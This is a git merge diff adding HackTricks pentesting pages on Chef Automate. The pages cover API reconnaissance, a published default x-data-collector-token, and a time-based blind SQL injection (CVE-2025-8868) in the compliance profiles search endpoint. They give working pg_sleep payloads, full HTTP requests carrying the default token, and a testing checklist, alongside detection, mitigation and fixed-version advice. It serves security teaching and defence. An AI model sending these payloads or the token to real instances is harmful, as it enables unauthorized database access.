Merge pull request #216 from HackTricks-wiki/update_Cooking_an_SQL_Injection_Vulnerability_in_Chef_Aut_20250930_182633

Cooking an SQL Injection Vulnerability in Chef Automate
2025-12-05 20:40:18 -08:00 · 2025-09-30 21:13:40 +02:00
parent f96fed548e 7097f55620
commit 8d39c38b58
4 changed files with 171 additions and 2 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -46,8 +46,10 @@
  - [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md)
 - [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md)
 - [Supabase Security](pentesting-ci-cd/supabase-security.md)
- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md)
+- [Check Automate Security](pentesting-ci-cd/chef-automate-security/README.md)
+  - [Chef Automate Enumeration And Attacks](pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md)
 - [Vercel Security](pentesting-ci-cd/vercel-security.md)
+- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md)
 - [TODO](pentesting-ci-cd/todo.md)

 # ⛈️ Pentesting Cloud
--- a/src/pentesting-ci-cd/chef-automate-security/README.md
+++ b/src/pentesting-ci-cd/chef-automate-security/README.md
@@ -0,0 +1,18 @@
+# Chef Automate Security
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## What is Chef Automate
+
+Chef Automate is a platform for infrastructure automation, compliance, and application delivery. It exposes a web UI (often Angular) that talks to backend gRPC services via a gRPC-Gateway, providing REST-like endpoints under paths such as /api/v0/.
+
+- Common backend components: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service
+- Auth mechanisms: user/API tokens and a data collector token header x-data-collector-token
+
+## Enumeration & Attacks
+
+{{#ref}}
+chef-automate-enumeration-and-attacks.md
+{{#endref}}
+
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md
+++ b/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md
@@ -0,0 +1,150 @@
+# Chef Automate Enumeration & Attacks
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Overview
+
+This page collects practical techniques to enumerate and attack Chef Automate instances, with emphasis on:
+- Discovering gRPC-Gateway-backed REST endpoints and inferring request schemas via validation/error responses
+- Abusing the x-data-collector-token authentication header when defaults are present
+- Time-based blind SQL injection in the Compliance API (CVE-2025-8868) affecting the filters[].type field in /api/v0/compliance/profiles/search
+
+> Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.
+
+## Recon: Architecture and Fingerprints
+
+- Front-end: Often Angular. Static bundles can hint at REST paths (e.g., /api/v0/...)
+- API transport: REST to gRPC via gRPC-Gateway
+  - Responses may include grpc-metadata-content-type: application/grpc
+- Database/driver fingerprints:
+  - Error bodies starting with pq: strongly suggest PostgreSQL with the Go pq driver
+- Interesting Compliance endpoints (auth required):
+  - POST /api/v0/compliance/profiles/search
+  - POST /api/v0/compliance/scanner/jobs/search
+
+## Auth: Data Collector Token (x-data-collector-token)
+
+Chef Automate exposes a data collector that authenticates requests via a dedicated header:
+
+- Header: x-data-collector-token
+- Risk: Some environments may retain a default token granting access to protected API routes. Known default observed in the wild:
+  - 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
+
+If present, this token can be used to call Compliance API endpoints otherwise gated by auth. Always attempt to rotate/disable defaults during hardening.
+
+## API Schema Inference via Error-Driven Discovery
+
+gRPC-Gateway-backed endpoints often leak useful validation errors that describe the expected request model.
+
+For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:
+
+- type: string (filter field identifier)
+- values: array of strings
+
+Example request shape:
+
+```json
+{
+  "filters": [
+    { "type": "name", "values": ["test"] }
+  ]
+}
+```
+
+Malformed JSON or wrong field types typically trigger 4xx/5xx with hints, and headers indicate the gRPC-Gateway behavior. Use these to map fields and localize injection surfaces.
+
+## Compliance API SQL Injection (CVE-2025-8868)
+
+- Affected endpoint: POST /api/v0/compliance/profiles/search
+- Injection point: filters[].type
+- Vulnerability class: time-based blind SQL injection in PostgreSQL
+- Root cause: Lack of proper parameterization/whitelisting when interpolating the type field into a dynamic SQL fragment (likely used to construct identifiers/WHERE clauses). Crafted values in type are evaluated by PostgreSQL.
+
+Working time-based payload:
+
+```json
+{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
+```
+
+Technique notes:
+- Close the original string with a single quote
+- Concatenate a subquery that calls pg_sleep(N)
+- Re-enter string context via || so the final SQL remains syntactically valid regardless of where type is embedded
+
+### Proof via differential latency
+
+Send paired requests and compare response times to validate server-side execution:
+
+- N = 1 second
+
+```
+POST /api/v0/compliance/profiles/search HTTP/1.1
+Host: <target>
+Content-Type: application/json
+x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
+
+{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
+```
+
+- N = 5 seconds
+
+```
+POST /api/v0/compliance/profiles/search HTTP/1.1
+Host: <target>
+Content-Type: application/json
+x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
+
+{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
+```
+
+Observed behavior:
+- Response times scale with pg_sleep(N)
+- HTTP 500 responses may include pq: details during probing, confirming SQL execution paths
+
+> Tip: Use a timing validator (e.g., multiple trials with statistical comparison) to reduce noise and false positives.
+
+### Impact
+
+Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can execute arbitrary SQL within Chef Automate’s PostgreSQL context, risking confidentiality and integrity of compliance profiles, configuration, and telemetry.
+
+### Affected versions / Fix
+
+- CVE: CVE-2025-8868
+- Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per vendor advisories
+
+## Detection and Forensics
+
+- API layer:
+  - Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
+  - Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
+- Database layer (PostgreSQL):
+  - Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
+- Authentication:
+  - Log and alert on usage of x-data-collector-token, especially known default values, across API paths
+
+## Mitigations and Hardening
+
+- Immediate:
+  - Rotate/disable default data collector tokens
+  - Restrict ingress to data collector endpoints; enforce strong, unique tokens
+- Code-level:
+  - Parameterize queries; never string-concatenate SQL fragments
+  - Strictly whitelist allowed type values on the server (enum)
+  - Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists
+
+## Practical Testing Checklist
+
+- Check if x-data-collector-token is accepted and whether the known default works
+- Map the Compliance API request schema by inducing validation errors and reading error messages/headers
+- Test for SQLi in less obvious “identifier-like” fields (e.g., filters[].type), not just values arrays or top-level text fields
+- Use time-based techniques with concatenation to keep SQL syntactically valid across contexts
+
+## References
+
+- [Cooking an SQL Injection Vulnerability in Chef Automate (XBOW blog)](https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate)
+- [Timing trace (XBOW)](https://xbow-website.pages.dev/traces/chef-automate-sql-injection/)
+- [CVE-2025-8868](https://www.cve.org/CVERecord?id=CVE-2025-8868)
+- [gRPC-Gateway](https://github.com/grpc-ecosystem/grpc-gateway)
+- [pq PostgreSQL driver for Go](https://github.com/lib/pq)
+
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
@@ -2,4 +2,3 @@

 {{#include ../../../banners/hacktricks-training.md}}

-{{#include ../../../banners/hacktricks-training.md}}